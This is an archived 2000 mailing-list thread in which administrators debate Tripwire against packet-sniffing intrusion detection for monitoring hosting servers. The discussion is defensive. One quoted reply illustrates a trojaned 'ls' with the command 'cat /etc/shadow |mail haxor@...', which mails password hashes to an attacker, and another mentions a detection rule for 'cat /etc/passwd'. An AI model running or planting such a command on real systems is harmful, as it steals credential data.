[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [cobalt-users] tripwire
- Subject: Re: [cobalt-users] tripwire
- From: "Geoff King" <geoff@xxxxxxxxxx>
- Date: Tue Mar 7 16:19:36 2000
Mark,
Sorry Mark but, my statement is true.
Yes, directories are defined. Perhaps, a hacker modifies files outside
/sbin or whatever directories are being monitored? My point was that you
couldn't possibly monitor the entire directory structure on a heavily used
server.
You should take a look again at packet monitoring software. They
monitor for key signatures that would indicate an exploit is being done
(i.e. the remote BIND exploit for example) or the many WU-FTPD exploits or
the many web CGI exploits, etc, etc, etc... I know that Sessionwall-3 does
this as I have used it extensively. I could even write a rule to monitor
for 'cat /etc/passwd' within a telnet session or whatever... No, packet
monitoring software will not tell you wether or not a file have been changed
or modified on a server. However, having a log of a user sending/recieving
data that matches a known exploit. Cybercop also has the ability to detect
intrusions and then throw up a bogus server for the hacker to waste his time
on all day thinking they'll get in to some goodie server.
What I was saying about Tripware is that, you will be notified AFTER the
fact that your files have been modified. You will have no indication before
hand.
This is kind of the same reason people put up security cameras instead
of inventorying all their stuff. It's a heck of a lot easier watching
someone steal something that remembering about the tiny trinket that's been
sitting on the shelf for 3 years. When was the last time you saw it?
Geoff
----- Original Message -----
From: "Mark Spieth" <mspieth@xxxxxxxxxxxx>
To: <cobalt-users@xxxxxxxxxxxxxxx>
Sent: Thursday, March 02, 2000 4:36 PM
Subject: RE: [cobalt-users] tripwire
> Actually this is NOT true. You are supposed to define what directories
> tripwire monitors. You point it to portions of your server that contain
> binary files such as /bin /sbin/ /usr this is where a hacker is going to
do
> things, not in a users web directory so the fact that those directories
> change won't affect tripwire.
>
> >>packet sniffing programs like ISS or what my business partner uses
> Sessionwall-3
> This only helps to attempt to track down a user. For example, The Bind
hack
> allows someone to gain a root shell via port 53, so as far as your sniffer
> goes, it will probably just see dns traffic. At least if you run tripwire
> should a hacker modify binaries on your machine, trip wire will notice the
> fact that command "ls" has been modified to do this:
>
> cat /etc/shadow |mail haxor@xxxxxxxxxx
> ls
>
>
>
> -----Original Message-----
> From: Geoff King [mailto:geoff@xxxxxxxxxx]
> Sent: Thursday, March 02, 2000 7:31 PM
> To: cobalt-users@xxxxxxxxxxxxxxx
> Subject: Re: [cobalt-users] tripwire
>
>
> Gary,
>
> I have installed Tripwire on a RedHat Linux v5.2 box.
>
> Basically, it's considerably useless on a server that many people use
> because it monitors changes in files, which on a hosting web server, files
> change quite often.
>
> I have found the best means of monitoring hackers is to obtain a stand
> alone server and use packet sniffing programs like ISS or what my business
> partner uses Sessionwall-3. There's a bunch more out there, I can't think
> of their names off the top of my head.
>
> I thought it was kind of moot point for Tripwire as you'd only know
> after the hacker gained access and modified files. It's much better
> watching the knock at the door first.
>
> Now, if the server is not used for many things, such as a secondary
DNS
> server, and that's it. Tripwire would be a fairly decent tool in that
you'd
> definately know if someone was on there and messing with files that should
> never be changed or modified.
>
> The other thing to do is hack your network yourself. I run Nessus
which
> is an open-source security scanner about once every 6 months to see what
it
> can do. It's a good idea to pay attention to the security announcements.
> Any administrator should know exactly where someone can break into their
> network. Also, an administrator should be able to notice odd or different
> behavior of servers and the network fairly quickly.
>
> Anyways, that's my 2 cents worth on tripwire. Good tool, for specific
> purposes. Don't ignore it, but don't count on it either.
>
> Geoff
>
> ----- Original Message -----
> From: "RHLinux" <rhlinux@xxxxxxxxxxx>
> To: "Cobalt-Users@xxxxxxxxxxxxxxx" <cobalt-users@xxxxxxxxxxxxxxx>
> Sent: Thursday, March 02, 2000 2:55 AM
> Subject: [cobalt-users] tripwire
>
>
> > has anyone tired installing tripwire on a raq2-3?
> >
> > its suppose to help in tracking would be attackers etc...
> >
> > http://www.zdnet.com/zdnn/stories/news/0,4586,2453339,00.html
> >
> > Gary
> >
> >
> > _______________________________________________
> > cobalt-users mailing list
> > cobalt-users@xxxxxxxxxxxxxxx
> > To Subscribe or Unsubscribe, please go to:
> > http://list.cobalt.com/mailman/listinfo/cobalt-users
> >
>
>
> _______________________________________________
> cobalt-users mailing list
> cobalt-users@xxxxxxxxxxxxxxx
> To Subscribe or Unsubscribe, please go to:
> http://list.cobalt.com/mailman/listinfo/cobalt-users
>
> _______________________________________________
> cobalt-users mailing list
> cobalt-users@xxxxxxxxxxxxxxx
> To Subscribe or Unsubscribe, please go to:
> http://list.cobalt.com/mailman/listinfo/cobalt-users
>